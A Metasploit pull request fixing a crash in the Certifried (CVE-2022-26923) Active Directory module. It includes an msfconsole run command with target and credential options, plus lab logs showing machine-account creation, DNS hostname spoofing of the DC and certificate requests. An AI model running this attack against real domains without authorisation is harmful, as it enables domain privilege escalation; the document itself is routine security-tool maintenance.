@cdelafuente-r7 cdelafuente-r7 commented Jun 4, 2025

This fixes #20249.

The cve_2022_26923_certifried module needed to be updated to account for the datastore option name created in #19606. The fix simply deregisters the new option names, which keeps the original behavior for this module and maintains consistency between the documentation and the datastore options.

Users can still use the USERNAME, PASSWORD, and DOMAIN options, which will be used for both SMB and LDAP authentication. This is possible because these options are declared as fallbacks for both protocols.

This also fixes an option key value when calling #delete_account, which is now different after the changes mentioned above.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use admin/dcerpc/cve_2022_26923_certifried
  • show options
  • Verify the LDAPUsername, LDAPPassword and LDAPDomain options are not there.
  • run verbose=true rhosts=<remote host> username=<username> password=<password> domain=<domain> dc_name=<DC hostname> ca=<CA name>
  • Verify it works as expected.

@smcintyre-r7 smcintyre-r7 left a comment

Before this change, stack trace:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[+] 192.168.159.10:445 - Successfully created msflab.local\DESKTOP-2CNON5ZP$
[+] 192.168.159.10:445 -   Password: fAvaaS4nBhWbivThKRuZU1MWyERtYmWH
[+] 192.168.159.10:445 -   SID:      S-1-5-21-3978004297-3499718965-4169012971-2108
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[*] 192.168.159.10:445 - Attempting to set the DNS hostname for the computer DESKTOP-2CNON5ZP$ to the DNS hostname for the DC: dc
[+] 192.168.159.10:445 - Successfully changed the DNS hostname
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 - Certificate DNS: DC.msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20250605130635_default_192.168.159.10_windows.ad.cs_715716.pfx
[*] 192.168.159.10:445 - Attempting PKINIT login for [email protected]
[-] 192.168.159.10:445 - Failed: Kerberos Error - KDC_ERR_CERTIFICATE_MISMATCH (66) - PKINIT - KDC_ERR_CERTIFICATE_MISMATCH, Target system is likely not vulnerable to Certifried
[*] 192.168.159.10:445 - Deleting the computer account DESKTOP-2CNON5ZP$
[-] 192.168.159.10:445 - Auxiliary failed: Msf::Exploit::Remote::MsSamr::MsSamrBadConfigError Unable to delete the account since its name is unknown
[-] 192.168.159.10:445 - Call stack:
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/core/exploit/remote/ms_samr/account.rb:135:in `delete_account'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:176:in `ensure in run'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb:180:in `run'
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >

After this change, no stack trace:

msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) > run
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[!] 192.168.159.10:445 - Received no result when trying to obtain ms-DS-MachineAccountQuota. Adding a computer account may not work.
[+] 192.168.159.10:445 - Successfully created msflab.local\DESKTOP-TKVEIOFW$
[+] 192.168.159.10:445 -   Password: tbUlPpP79hlYze8PJwg9sWkihX6coWMW
[+] 192.168.159.10:445 -   SID:      S-1-5-21-3978004297-3499718965-4169012971-2107
[+] 192.168.159.10:445 - Successfully authenticated to LDAP (192.168.159.10:636)
[*] 192.168.159.10:445 - Attempting to set the DNS hostname for the computer DESKTOP-TKVEIOFW$ to the DNS hostname for the DC: dc
[+] 192.168.159.10:445 - Successfully changed the DNS hostname
[-] 192.168.159.10:445 - There was an error while requesting the certificate.
[-] 192.168.159.10:445 - Denied by Policy Module
[-] 192.168.159.10:445 - Error details:
[-] 192.168.159.10:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 192.168.159.10:445 -   HRESULT: (0x8009480f) CERTSRV_E_SUBJECT_DNS_REQUIRED: The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
[*] 192.168.159.10:445 - Deleting the computer account DESKTOP-TKVEIOFW$
[+] 192.168.159.10:445 - The specified account has been deleted.
[-] 192.168.159.10:445 - Auxiliary aborted due to failure: unknown: The Domain Name System (DNS) name is unavailable and cannot be added to the Subject Alternate name.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >

@smcintyre-r7 smcintyre-r7 merged commit 66a9f33 into rapid7:master Jun 5, 2025
18 of 19 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Jun 5, 2025
@smcintyre-r7

Release Notes

This fixes an issue in the certifried module that was causing it to crash.

@smcintyre-r7 smcintyre-r7 added module easy rn-fix release notes fix labels Jun 5, 2025
Successfully merging this pull request may close these issues.

Fix the cve_2022_26923_certifried module
